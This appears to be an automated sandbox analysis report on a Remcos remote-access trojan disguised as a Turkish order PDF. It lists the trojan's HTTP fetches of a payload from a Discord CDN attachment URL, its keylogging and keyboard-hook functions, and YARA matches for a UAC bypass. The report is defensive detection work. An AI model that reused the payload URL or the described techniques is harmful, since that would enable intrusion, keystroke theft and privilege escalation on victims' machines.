                    Source: Eluiezilfw.exe, 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwm
                    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_00402149
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 21Host: cdn.discordapp.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 16Host: cdn.discordapp.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 91Host: cdn.discordapp.comCache-Control: no-cache
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to capture and log keystrokes
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Esc] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Enter] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Tab] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Down] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Right] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Up] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Left] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [End] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [F2] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [F1] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Del] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Del] 3_2_00405EB2
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10546C64 SetWindowsHookExA 0000000D,004052BA,00000000,000000003_2_10546C64
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait3_2_0040D2A6
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.308934385.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,3_2_0040532D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait3_2_0040D2A6

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10554D8D SystemParametersInfoW,3_2_10554D8D

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
